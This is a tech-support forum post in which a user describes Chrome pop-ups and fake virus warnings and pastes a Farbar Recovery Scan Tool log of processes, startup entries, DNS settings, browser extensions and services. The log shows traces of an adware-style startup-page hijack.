Solved I believe I have malware on my computer.

shivmister

I have this issue when I am using Chrome that I will periodically get a pop-up for random websites; now I'm getting pop-ups saying that I have a virus. It has been an issue for at least a month or so. I have tried to handle it by trying to run Malwarebytes. Malwarebytes did detect some 38 items, which I had already removed. The problem still persists. I did run Malwarebytes before I came across this forum. I have attached the 2 logs below. Please help me. Thank you!

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:04-10-2015
Ran by 007 (administrator) on SHIVANG (03-03-2017 16:52:14)
Running from C:\Users\007\Desktop
Loaded Profiles: 007 (Available Profiles: 007)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool:

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\ibtrksrv.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyLpmService.exe
(Intel Corporation) C:\Windows\System32\DptfParticipantProcessorService.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyConfigTDPService.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyCriticalService.exe
(Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Lenovo Smart Voice\LsvUIService.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe
(Nalpeiron Ltd.) C:\Windows\SysWOW64\NLSSRV32.EXE
(Nitro PDF Software) C:\Program Files\Common Files\Nitro\Pro\8.0\NitroPDFDriverService8x64.exe
(Motorola) C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
(PointGrab LTD) C:\Program Files (x86)\Lenovo\Motion Control\PGService.exe
(Lenovo) C:\Program Files\Lenovo Yoga PhoneCompanion\PhoneCompanionPusher.exe
() C:\Program Files\CyberLink\Shared files\RichVideo64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Lenovo) C:\ProgramData\LenovoTransition\Server\x64\ymc.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Hewlett-Packard) C:\Program Files (x86)\Examsoft\Softest 11.0\Examsoft.ShieldRunner.exe
Failed to access process -> Memory Compression
(Examsoft Worldwide Inc.) C:\Program Files (x86)\Examsoft\Softest 11.0\Examsoft.SoftShield.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.7.0_x64__8wekyb3d8bbwe\Microsoft.StickyNotes.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgentUserBroker.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyLpmServiceHelper.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek semiconductor) C:\Windows\RTFTrack.exe
() C:\Program Files (x86)\Lenovo\Lenovo Transition\Transition.exe
(Lenovo(beijing) Limited) C:\Program Files (x86)\Lenovo\Energy Manager\Energy Manager.exe
() C:\Program Files (x86)\Lenovo\Lenovo Transition\TransitionServer.exe
(Lenovo(beijing) Limited) C:\Program Files (x86)\Lenovo\Energy Manager\utility.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Yoga Picks\Yoga Picks.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Lenovo Smart Voice\LsvTrayLoad.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Lenovo Smart Voice\LsvController.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.110.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [DptfPolicyLpmServiceHelper] => C:\WINDOWS\system32\DptfPolicyLpmServiceHelper.exe [111976 2013-08-02] (Intel Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13653208 2013-09-12] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1321688 2013-08-30] (Realtek Semiconductor)
HKLM\...\Run: [RtsFT] => C:\WINDOWS\RTFTrack.exe [6340312 2013-07-19] (Realtek semiconductor)
HKLM\...\Run: [IgfxTray] => C:\windows\system32\igfxtray.exe [401896 2016-11-01] ()
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-07] (Intel Corporation)
HKLM\...\Run: [Yoga PhoneCompanion] => C:\Program Files\Lenovo Yoga PhoneCompanion\Yoga Phone Companion.exe [844304 2013-10-26] (Lenovo)
HKLM\...\Run: [AutoStartTransition] => C:\Program Files (x86)\Lenovo\Lenovo Transition\Transition.exe [294672 2013-10-26] ()
HKLM\...\Run: [Energy Manager] => C:\Program Files (x86)\Lenovo\Energy Manager\Energy Manager.exe [59925488 2013-10-26] (Lenovo(beijing) Limited)
HKLM\...\Run: [Lenovo Utility] => C:\Program Files (x86)\Lenovo\Energy Manager\Utility.exe [80880 2013-10-26] (Lenovo(beijing) Limited)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944136 2015-06-03] (Synaptics Incorporated)
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2016-09-24] (Microsoft Corporation)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176440 2016-11-01] (Apple Inc.)
HKLM-x32\...\Run: [Lenovo App Shop] => C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\ismagent.exe [156000 2013-07-18] (Intel Corporation)
HKLM-x32\...\Run: [Yoga Picks] => C:\Program Files (x86)\Lenovo\Yoga Picks\Yoga Picks.exe [90640 2013-07-09] (Lenovo)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [598552 2016-06-22] (Oracle Corporation)
HKLM\...\Policies\Explorer: [NoFolderOptions] 0
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\Run: [AirDroid 3] => C:\Program Files (x86)\AirDroid\AirDroid.exe [8696832 2016-08-04] (Sand Studio)
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9292504 2016-12-21] (Piriform Ltd)
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\Run: [GoogleChromeAutoLaunch_D61B85333F3CD95B073389B3076505BE] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1116504 2017-02-01] (Google Inc.)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-11-01] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-11-01] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-11-01] (Microsoft Corporation)
Startup: C:\Users\007\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2016-11-07]
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass IE RunOnce.lnk [2015-11-07]
ShortcutTarget: Install LastPass IE RunOnce.lnk -> C:\Program Files (x86)\Common Files\lpuninstall.exe (LastPass)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 8.8.8.8 8.8.4.4
Tcpip\Parameters: [NameServer] 8.8.8.8,8.8.8.4
Tcpip\..\Interfaces\{0d251055-31ed-48ea-b574-65a04995c8e1}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{233b3be6-3a13-4215-9df0-79c7b19ef857}: [DhcpNameServer] 82.163.143.176
Tcpip\..\Interfaces\{2d1fd792-4a77-47a7-856f-7fba5303331a}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{2d1fd792-4a77-47a7-856f-7fba5303331a}: [DhcpNameServer] 8.8.8.8 8.8.4.4
Tcpip\..\Interfaces\{9ec270b1-c6a4-454b-bfbf-ee40f8d875f6}: [DhcpNameServer] 82.163.143.176
Tcpip\..\Interfaces\{e5a2d9d9-828e-453f-8fae-e6e1988b15eb}: [NameServer] 8.8.8.8,8.8.4.4

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://lenovo13.msn.com/?pc=LCJB
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://home.lenovo.com
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = hxxp://home.lenovo.com
SearchScopes: HKLM -> DefaultScope {DA333138-ED30-42B1-BFA9-F83C9197A11D} URL =
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2016-12-13] (Microsoft Corporation)
BHO: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar_x64.dll [2015-11-07] (LastPass)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2016-11-01] (Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll [2016-12-13] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\ssv.dll [2016-08-04] (Oracle Corporation)
BHO-x32: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar.dll [2015-11-07] (LastPass)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-11-01] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\jp2ssv.dll [2016-08-04] (Oracle Corporation)
Toolbar: HKLM - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar_x64.dll [2015-11-07] (LastPass)
Toolbar: HKLM-x32 - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar.dll [2015-11-07] (LastPass)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2016-07-29] (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2012-06-01] (Skype Technologies)
Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\System32\tbauth.dll [2016-07-16] (Microsoft Corporation)
Handler-x32: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll [2016-07-16] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\007\AppData\Roaming\Mozilla\Firefox\Profiles\2yh9pvk0.default
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_24_0_0_221.dll [No File]
FF Plugin: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass64.dll [2015-11-07] (LastPass)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_221.dll [No File]
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2015-12-29] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2015-12-29] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2015-12-29] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2015-12-29] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\PROGRAM FILES (X86)\FOXIT SOFTWARE\FOXIT READER\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\PROGRAM FILES (X86)\FOXIT SOFTWARE\FOXIT READER\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xdp -> C:\PROGRAM FILES (X86)\FOXIT SOFTWARE\FOXIT READER\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xfdf -> C:\PROGRAM FILES (X86)\FOXIT SOFTWARE\FOXIT READER\plugins\npFoxitReaderPlugin.dll [2015-02-11] (Foxit Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-08-08] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-08-08] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\dtplugin\npDeployJava1.dll [2016-08-04] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\plugin2\npjp2.dll [2016-08-04] (Oracle Corporation)
FF Plugin-x32: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass64.dll [2015-11-07] (LastPass)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-07-12] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2015-11-08] (Microsoft Corporation)
FF Plugin-x32: @nitropdf.com/NitroPDF -> C:\Program Files (x86)\Nitro\Pro 8\npnitromozilla.dll [2013-06-28] (Nitro PDF)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-12-23] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3283718265-1983809055-1317204610-1001: intel.com/AppUp -> C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\npAppUp.dll [2013-07-18] (Intel)
FF Plugin HKU\S-1-5-21-3283718265-1983809055-1317204610-1001: intel.com/AppUpx64 -> C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\npAppUp_x64.dll [2013-07-18] (Intel)
FF Extension: Video DownloadHelper - C:\Users\007\AppData\Roaming\Mozilla\Firefox\Profiles\2yh9pvk0.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2016-01-02]
FF Extension: Adblock Plus - C:\Users\007\AppData\Roaming\Mozilla\Firefox\Profiles\2yh9pvk0.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-01-02]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi [2017-01-22]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/ig
CHR RestoreOnStartup: Default -> "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRggQcVwABFtEGBhAcgEITA1AQwwOeA4OBRRDRQxCJgBcVlhBRAwFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlEgVFxAK3JWDk4="
CHR StartupUrls: Default -> "hxxp://www.google.com/ig","hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRggQcVwABFtEGBhAcgEITA1AQwwOeA4OBRRDRQxCJgBcVlhBRAwFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlEgVFxAK3JWDk4="
CHR Profile: C:\Users\007\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-07]
CHR Extension: (Google Docs) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-07]
CHR Extension: (Google Drive) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-07]
CHR Extension: (Shortcuts for Google™) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\baohinapilmkigilbbbcccncoljkdpnd [2017-01-26]
CHR Extension: (YouTube) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-07]
CHR Extension: (Google Cast) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\boadgeojelhgndaghljhdicfkmllpafd [2015-11-10]
CHR Extension: (Adblock Plus) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2015-11-07]
CHR Extension: (Pushbullet) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\chlffgpmiacpedhhbkiomidkjlcfhogd [2015-11-07]
CHR Extension: (Videostream for Google Chromecast™) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnciopoikihiagdjbjpnocolokfelagl [2015-11-07]
CHR Extension: (Google Search) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-07]
CHR Extension: (Google Calendar) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjicmeblgpmajnghnpcppodonldlgfn [2015-11-07]
CHR Extension: (Google Sheets) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-07]
CHR Extension: (Google Docs Offline) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-07]
CHR Extension: (AdBlock) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2015-11-07]
CHR Extension: (TinEye Reverse Image Search) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\haebnnbpedcbhciplfhjjkbafijpncjl [2015-11-07]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2017-01-22]
CHR Extension: (IE Tab) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\hehijbfgiekmjfkfjpbkbammjbdenadd [2015-11-07]
CHR Extension: (feedly) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipbfijinpcgfogaopmgehiegacbhmob [2016-06-13]
CHR Extension: (goo.gl URL Shortener) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\iblijlcdoidgdpfknkckljiocdbnlagk [2015-11-07]
CHR Extension: (Google Play Music) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\icppfcnhkcmnfdhfhphakoifcfokfdhg [2015-11-07]
CHR Extension: (Google Maps) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2015-11-07]
CHR Extension: (RSS Subscription Extension (by Google)) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbjncdgjeocebhnmkbbbdekmmmcbfjd [2015-11-07]
CHR Extension: (Chrome Web Store Payments) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-07]
CHR Extension: (Remote Torrent Adder) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\oabphaconndgibllomdcjbfdghcmenci [2015-11-07]
CHR Extension: (Gmail) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-07]
CHR Extension: (Chrome Media Router) - C:\Users\007\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-08-02]
CHR HKLM\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd] - hxxp://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-09-22] (Apple Inc.)
S3 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [433688 2016-01-07] (BlueStack Systems, Inc.)
S3 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [413208 2016-01-07] (BlueStack Systems, Inc.)
S3 BstHdUpdaterSvc; C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe [859672 2016-01-07] (BlueStack Systems, Inc.)
S2 CDPUserSvc; C:\Windows\System32\CDPUserSvc.dll [339456 2016-11-11] (Microsoft Corporation)
R2 CDPUserSvc_552b6; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R2 CDPUserSvc_552b6; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [3042032 2017-01-17] (Microsoft Corporation)
S4 DACoreService; C:\Program Files (x86)\Nuance\Dragon Assistant\Core\DACore.exe [432528 2013-05-02] (Nuance Communications, Inc.)
R2 DptfParticipantProcessorService; C:\Windows\system32\DptfParticipantProcessorService.exe [115632 2013-08-02] (Intel Corporation)
R2 DptfPolicyConfigTDPService; C:\Windows\system32\DptfPolicyConfigTDPService.exe [116656 2013-08-02] (Intel Corporation)
R2 DptfPolicyCriticalService; C:\Windows\system32\DptfPolicyCriticalService.exe [148688 2013-08-02] (Intel Corporation)
R2 DptfPolicyLpmService; C:\Windows\system32\DptfPolicyLpmService.exe [124880 2013-08-02] (Intel Corporation)
S3 FrameServer; C:\Windows\system32\FrameServer.dll [805888 2016-11-02] (Microsoft Corporation)
S3 HvHost; C:\Windows\System32\hvhostsvc.dll [67584 2016-07-16] (Microsoft Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-07] (Intel Corporation)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [373744 2016-11-01] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [733696 2013-05-11] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [822232 2013-05-11] (Intel(R) Corporation)
R2 Intel(R) Wireless Bluetooth(R) 4.0 Radio Management; C:\Program Files (x86)\Intel\Bluetooth\ibtrksrv.exe [155448 2013-09-20] (Intel Corporation)
